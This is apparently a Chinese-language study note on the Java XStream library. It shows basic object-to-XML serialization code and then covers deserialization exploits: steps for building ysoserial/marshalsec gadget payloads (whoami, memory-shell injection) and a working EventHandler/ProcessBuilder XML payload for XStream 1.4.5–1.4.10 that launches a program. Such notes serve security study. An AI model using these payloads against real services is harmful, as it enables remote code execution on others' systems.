参考:
https://www.bbsmax.com/A/kmzLWkWBdG/ 基本使用
https://blog.csdn.net/wenrennaoda/article/details/105564606 各版本漏洞触发原理
https://zhuanlan.zhihu.com/p/375239304
基本使用
xstream主要作用:类与XML互相转换
引入依赖
<dependencies>
<dependency>
<groupId>com.thoughtworks.xstream</groupId>
<artifactId>xstream</artifactId>
<version>1.4.10</version>
</dependency>
</dependencies>
创建Student类
import java.io.Serializable;
public class Student implements Serializable {
private int id;
private String name;
private String school;
public Student() {
// TODO Auto-generated constructor stub
}
public Student(int id, String name, String school) {
super();
this.id = id;
this.name = name;
this.school = school;
}
public int getId() {
return id;
}
public void setId(int id) {
this.id = id;
}
public String getName() {
return name;
}
public void setName(String name) {
this.name = name;
}
public String getSchool() {
return school;
}
public void setSchool(String school) {
this.school = school;
}
@Override
public String toString() {
return "Student [id=" + id + ", name=" + name + ", school=" + school + "]";
}
}
测试SerializeXml类:数组类与XML互转
package com.ser.test;
import com.thoughtworks.xstream.XStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
public class SerializeXml {
public static void main(String[] args) {
serializeToXml();
System.out.println("**************************************");
deserialize();
}
public static void serializeToXml() {
FileOutputStream write = null;
Student stu1 = new Student(10003, "claire", "hh");
Student stu2 = new Student(10004, "leafly", "niubi");
Student[] students = {stu1,stu2};
XStream xstream = new XStream();
try {
//将文流怼到文件上
write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中
xstream.toXML(students, write);
} catch (FileNotFoundException e) {
e.printStackTrace();
}
//将序列化结果输出
System.out.println(xstream.toXML(students));
}
public static void deserialize() {
FileInputStream reader;
XStream xstream = new XStream();
Student[] students=null;
try {
reader = new FileInputStream ("myObjtoXml.txt");
//将Xml文件反序列化为Student对象
students=(Student[])xstream.fromXML(reader);
if (students != null) {
for (Student student : students) {
System.out.println(student);
}
}
} catch (FileNotFoundException e) {
e.printStackTrace();
}
}
}
运行后生成XML文件
<com.ser.test.Student-array>
<com.ser.test.Student>
<id>10003</id>
<name>claire</name>
<school>hh</school>
</com.ser.test.Student>
<com.ser.test.Student>
<id>10004</id>
<name>leafly</name>
<school>niubi</school>
</com.ser.test.Student>
</com.ser.test.Student-array>
测试SerializeXml类:单个类与XML互转
package com.ser.test;
import com.thoughtworks.xstream.XStream;
import java.io.FileInputStream;
import java.io.FileNotFoundException;
import java.io.FileOutputStream;
public class SerializeXml {
public static void main(String[] args) {
serializeToXml();
System.out.println("**************************************");
deserialize();
}
public static void serializeToXml() {
FileOutputStream write = null;
Student stu1 = new Student(10003, "claire", "hh");
;
XStream xstream = new XStream();
try {
//将文流怼到文件上
write = new FileOutputStream("myObjtoXml.txt");
//将学生对象序列化成Xml并通过流写入到文件中
xstream.toXML(stu1, write);
} catch (FileNotFoundException e) {
e.printStackTrace();
}
//将序列化结果输出
System.out.println(xstream.toXML(stu1));
}
public static void deserialize() {
FileInputStream reader;
XStream xstream = new XStream();
try {
reader = new FileInputStream ("myObjtoXml.txt");
Student stu1=(Student)xstream.fromXML(reader);
System.out.println(stu1);
} catch (FileNotFoundException e) {
e.printStackTrace();
}
}
}
生成XML如下:
<com.ser.test.Student>
<id>10003</id>
<name>claire</name>
<school>hh</school>
</com.ser.test.Student>
探测URLDNSLOG
POC生成
IDEA导入marshalsec项目,将ysoserial引入依赖
找到想修改的gadgets,这里以CommonsBeanutils为例子
注释掉原有的生object的逻辑,替换成调用ys的逻辑
直接保存,注释掉源代码中serializeToXml,直接反序列化,尝试解析
生成依赖于CommonsBeanutils1直接执行命令的exp
如下 ,因为这里不需要借助ldap远程加载,所以顺者ys的exp生成逻辑写一遍代码,如目标的gadgets的CommonsBeanutils1,执行whoami等,如果需要注入内存马,则替换对ys的模块
其他EXP
基于EventHandler,版本要求:1.4.10 1.4.6 1.4.5
<sorted-set>
<string>foo</string>
<dynamic-proxy>
<interface>java.lang.Comparable</interface>
<handler class="java.beans.EventHandler">
<target class="java.lang.ProcessBuilder">
<command>
<string>open</string>
<string>/System/Applications/Calculator.app</string>
</command>
</target>
<action>start</action>
</handler>
</dynamic-proxy>
</sorted-set>